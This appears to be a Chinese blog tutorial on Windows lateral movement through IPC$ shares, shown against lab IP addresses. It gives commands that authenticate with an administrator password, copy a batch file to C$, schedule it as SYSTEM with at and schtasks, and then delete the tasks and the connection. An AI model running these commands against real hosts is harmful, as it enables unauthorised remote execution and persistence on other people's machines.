IPC
定义
IPC共享"命名管道"的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。
通过IPC$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标计算机机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
IPC$的利用条件
- 开启了139、445端口。ipc$可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。
- 管理员开启了默认共享。默认共享是为了方便管理员进行远程管理而默认开启的,包括
c$、d$、e$等和系统目录winnt或admin$。 - 需要目标机器关闭如下选项:
获取远程主机信息
首先我们得先建立命名管道
net use \\192.168.72.134\IPC$ "admin" /user:Administrator
net use
查看对应磁盘的信息
dir \\192.168.72.134\c$
使用tasklist命令的/S、/U、/P参数列出远程主机上运行的进程
tasklist /S 192.168.72.134 /U administrator /P admin
查看目标主机的时间(便于定计时任务)
net time \\192.168.72.134
计时任务
at
at是Windows自带的用于创建计划任务的命令,它主要工作在Windows Server2008之前版本中,创建计划任务的流程大致如下:
at 语法:at +时间+运行程序
1、将本地文件传入对方电脑C盘
copy "calc.bat" \\192.168.72.134\C$
2、定计时任务
at \\192.168.72.134 14:43 C:\calc .bat
也可在指定运行命令输出到指定文件
at \\192.168.72.134 14:47 cmd.exe /c "ipconfig >C:/1.txt"
3、清除at记录
at \\192.168.72.134 1 /delete
schtasks
at命令在2008废除了,之后用到的是schtasks
常用参数有
(Schtasks(计划任务)命令详解_一个懒鬼的博客-CSDN博客
/s:指定远程计算机的名称或 IP 地址(带有或者没有反斜杠)。默认值是本地计算机。
/p:更改用于任务的帐户密码。输入新的密码。
/f:阻止确认消息。不警告就删除任务。
/tn:标识要更改的任务。输入任务名。
/tr:指定任务运行的程序或命令。
/sc:指定计划类型。
| 值 | 说明 |
|---|---|
| MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY | 指定计划的时间单位。 |
| ONCE | 任务在指定的日期和时间运行一次。 |
| ONSTART | 任务在每次系统启动的时候运行。可以指定启动的日期,或下一次系统启动的时候运行任务。 |
| ONLOGON | 每当用户(任意用户)登录的时候,任务就运行。可以指定日期,或在下次用户登录的时候运行任务。 |
| ONIDLE | 只要系统空闲了指定的时间,任务就运行。可以指定日期,或在下次系统空闲的时候运行任务。 |
1、创建计划任务
schtasks /create /tn test /U administrator /P admin /tr "c:\calc1.bat" /sc MINUTE /mo 1 /s 192.168.52.163 /RU system
2、执⾏计划任务
schtasks /run /tn test /s 192.168.52.163 /U administrator /P admin
3、删除计划任务
schtasks /F /delete /tn test /s 192.168.52.163 /u administrator /p admin
4、删除IPC
net use \\192.168.52.163\ipc$ /del /y
875
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
